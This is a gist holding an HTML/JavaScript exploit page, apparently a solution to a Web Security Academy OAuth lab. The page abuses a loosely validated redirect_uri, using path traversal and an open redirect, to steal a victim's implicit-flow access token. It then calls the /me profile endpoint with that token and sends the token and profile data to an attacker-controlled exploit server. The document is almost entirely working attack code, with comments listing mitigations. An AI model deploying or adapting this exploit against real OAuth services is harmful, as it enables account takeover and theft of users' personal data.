@UNC1739
Last active February 18, 2025 00:05
OAuth RedirectURI to Open Redirect Exploit
<!DOCTYPE html>
<html>
<head>
<script>
// Lab configuration. Every value here is interpolated into the authorization
// request built in the DOMContentLoaded handler below, or into the /me call.
// NOTE(review): the hostnames look like per-instance training-lab hosts; confirm before reuse.

// OAuth client_id sent to the authorization server.
const clientId = 'mrg1s33zswbvzan5glqj1';
// Host of the authorization server; used for both the /auth redirect and the /me request.
const oauthServerDomain = 'oauth-0a70007704d9237081a92ded02d500fc.oauth-server.net';
// Origin of the client application; becomes the leading part of the redirect_uri parameter.
const redirectUri = 'https://0a0e00d804a723f281952f88004b0071.web-security-academy.net';
// Host named in the `path` parameter; presumably the host serving this page (the
// collection request below uses the relative path /test). Confirm against the deployment.
const exploitServerDomain = 'exploit-0a3500fe045423e4819c2ec301bb005c.exploit-server.net';
// Percent-encode the full https://<host>/test URL so it can be carried as a single
// query-parameter value.
const encodedExploitServerDomain = encodeURIComponent(`https://${exploitServerDomain}/test`);
/**
 * Read the `access_token` parameter from the current URL fragment.
 *
 * The fragment (everything after `#`) is parsed as a query string. With
 * response_type=token the authorization server places the token there, so any
 * script running on the landing page can read it; this is the property the
 * rest of the page depends on.
 *
 * @returns {string|null} The token value, or null when the fragment has no
 *   `access_token` parameter.
 */
function getAccessTokenFromURL() {
  // Drop the leading '#' before handing the fragment to the parser.
  const fragment = window.location.hash.slice(1);
  return new URLSearchParams(fragment).get('access_token');
}
/**
 * Call the authorization server's /me endpoint with the given bearer token and
 * return the JSON response re-serialised and base64-encoded.
 *
 * Failures are logged to the console and not rethrown, so the returned promise
 * then resolves to undefined.
 *
 * @param {string} token - Access token sent in the Authorization header.
 * @returns {Promise<string|undefined>} Base64 of the JSON body, or undefined on error.
 */
function fetchAdditionalInfo(token) {
  const profileUrl = `https://${oauthServerDomain}/me`;
  const requestOptions = {
    method: 'GET',
    headers: {
      'Authorization': `Bearer ${token}`,
      'Content-Type': 'application/json',
    },
  };
  const toBase64Json = (profile) => btoa(JSON.stringify(profile));
  const logFailure = (err) => console.error('Error fetching additional info:', err);

  return fetch(profileUrl, requestOptions)
    .then((res) => res.json())
    .then(toBase64Json)
    .catch(logFailure);
}
/**
 * Report the token and the /me data to the relative endpoint /test.
 *
 * The token is base64-encoded into the `fragment` query parameter and the
 * already-encoded /me data goes into `info`. Because the path is relative, the
 * request goes to whichever origin served this page, and both values travel in
 * the request URL. The fetch is not awaited: the returned promise settles once
 * the request has been started, and the response or any error is only logged.
 *
 * @param {string} token - Access token taken from the URL fragment.
 * @returns {Promise<void>}
 */
async function sendTokenRequest(token) {
  const encodedInfo = await fetchAdditionalInfo(token);
  const reportUrl = `/test?fragment=${btoa(token)}&info=${encodedInfo}`;

  fetch(reportUrl)
    .then((res) => res.json())
    .then((body) => console.log(body))
    .catch((err) => console.error('Error sending token request:', err));
}
// Entry point, run once the document has been parsed. The page is visited
// twice: first without a token (start the authorization request), then again
// with the token in the fragment (report it).
document.addEventListener('DOMContentLoaded', () => {
  const accessToken = getAccessTokenFromURL();

  if (accessToken) {
    // A token is present in the fragment: report it together with the /me data.
    sendTokenRequest(accessToken);
    return;
  }

  // No token yet: navigate to the authorization endpoint.
  // - redirect_uri is the client origin followed by /oauth-callback/../post/next
  //   and a `path` parameter naming the other host. For the server to honour
  //   it, redirect_uri validation would have to be looser than an exact match
  //   (presumably a prefix check; the registration is not visible here).
  // - response_type=token returns the access token in the URL fragment.
  // - nonce is a fixed literal rather than a per-request value.
  // Mitigations that break this chain: exact string comparison of redirect_uri
  // against the registered value, an allow-list on the client's `path`
  // redirect parameter, and the authorization code flow with PKCE instead of
  // response_type=token.
  const authorizationUrl = `https://${oauthServerDomain}/auth?client_id=${clientId}&redirect_uri=${encodeURIComponent(redirectUri)}/oauth-callback/../post/next?path=${encodedExploitServerDomain}&response_type=token&nonce=-1826296433&scope=openid profile email`;
  window.location.href = authorizationUrl;
});
</script>
</head>
<body>
</body>
</html>